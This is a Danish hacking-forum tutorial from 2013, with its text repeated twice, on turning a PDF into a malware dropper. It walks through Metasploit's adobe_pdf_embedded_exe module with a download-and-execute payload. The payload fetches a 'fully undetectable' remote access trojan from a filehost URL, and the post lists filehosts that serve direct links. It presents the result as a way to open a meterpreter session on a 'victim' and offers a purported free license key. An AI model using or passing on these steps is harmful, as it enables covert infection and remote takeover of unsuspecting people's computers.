12-10-2013, 13:05
Credits til http://anonymouseverywhere.blogspot.dk/ , jeg har bare oversat guiden til Dansk!
Backfoor en PDF fil med din RAT
Inden du stater, så hav en PDF fil og din fud server/rat liggende på dit skrivebord i en mappe (forklaring i slutningen af tråd)
Download Metasploit direkte fra deres egen side her:
http://www.rapid7.com/products/metasploit/download.jsp
Gratis key til Metasploit 32bit: Q2ND-3CHX-WGCL-EPY9
Now let me explain how this exploit works. This is just a basic exploit that will open drops of a reverse_tcp meterpreter session on the victim when it's executed. Also, this exploit works while the PDF is open until it is migrated to another process.
Hvad du behøver for at fuldføre dette:
En PDF fil (kan fx være en guide eller ebook eller lign)
En FUD server (din RAT, husk det skal være 100% FUD)
Og Metasploit
Husk altid at tjek om din version af metasploit er up to date!
Og husk aldrig at skriv store bogstaver i metasploit (A,B C osv, kun a,b,c). Ellers vil der kommer errors, så bare følg tutorialen og skriv som jeg skriver.
Note:
Husk at have en PDF fil klar, og din server/rat uploaded til en filehost som supporter direkte links.
Nogle eksempler:
Trin 1
Først skal vi have infected vores PDF fil, før at gøre dette skal du åbne Metasploit's Console og skriv følgende:
PHP Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Trin 2
Efter du har skrevet den command, skal du strukturer filerne, ved at skrive følgende:
PHP Code:
set payload windows/download_exec
Trin 3
Nu skal du finde din PDF fils placering, og skrive følgende command:
Dette er bare et eksempel: C:/Users/Owner/Desktop/example.pdf
PHP Code:
set INFILENAME C:/Users/Owner/Desktop/example.pdf
Trin 4
Nu skal du bruge det direkte download link til din FUD server/rat, skriv følgende command:
PHP Code:
set url www.downloadminfil.nu/jegvilinfectedig
Nu du færdig!
Metasploirt vil automatisk gemme den færdig backdoored fil samme sted som du havde placeret din PDF fil. (Derfor jeg sagde det var nemmest hvis du lagde alle filerne på dit skrivebord i en mappe inden start)
Backfoor en PDF fil med din RAT
Inden du stater, så hav en PDF fil og din fud server/rat liggende på dit skrivebord i en mappe (forklaring i slutningen af tråd)
Download Metasploit direkte fra deres egen side her:
http://www.rapid7.com/products/metasploit/download.jsp
Gratis key til Metasploit 32bit: Q2ND-3CHX-WGCL-EPY9
Now let me explain how this exploit works. This is just a basic exploit that will open drops of a reverse_tcp meterpreter session on the victim when it's executed. Also, this exploit works while the PDF is open until it is migrated to another process.
Hvad du behøver for at fuldføre dette:
En PDF fil (kan fx være en guide eller ebook eller lign)
En FUD server (din RAT, husk det skal være 100% FUD)
Og Metasploit
Husk altid at tjek om din version af metasploit er up to date!
Og husk aldrig at skriv store bogstaver i metasploit (A,B C osv, kun a,b,c). Ellers vil der kommer errors, så bare følg tutorialen og skriv som jeg skriver.
Note:
Husk at have en PDF fil klar, og din server/rat uploaded til en filehost som supporter direkte links.
Nogle eksempler:
Kode:
http://ge.tt/ - MIN EGEN FAVORIT!
http://scan.psomasweb.org/
http://sharesend.com/
http://www.directlink.tv
http://www.filehold.net
http://www.dlandexe.com
http://www.wss-coding.com/upload
http://www.botz.in
http://kiwi6.com/
http://zippyshare.com/
http://drop.st/
http://filetolink.com/
http://freewayhost.net/
http://largedocument.com/
http://rghost.net/
http://dox.abv.bg/files/share
Trin 1
Først skal vi have infected vores PDF fil, før at gøre dette skal du åbne Metasploit's Console og skriv følgende:
PHP Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Trin 2
Efter du har skrevet den command, skal du strukturer filerne, ved at skrive følgende:
PHP Code:
set payload windows/download_exec
Trin 3
Nu skal du finde din PDF fils placering, og skrive følgende command:
Dette er bare et eksempel: C:/Users/Owner/Desktop/example.pdf
PHP Code:
set INFILENAME C:/Users/Owner/Desktop/example.pdf
Trin 4
Nu skal du bruge det direkte download link til din FUD server/rat, skriv følgende command:
PHP Code:
set url www.downloadminfil.nu/jegvilinfectedig
Nu du færdig!
Metasploirt vil automatisk gemme den færdig backdoored fil samme sted som du havde placeret din PDF fil. (Derfor jeg sagde det var nemmest hvis du lagde alle filerne på dit skrivebord i en mappe inden start)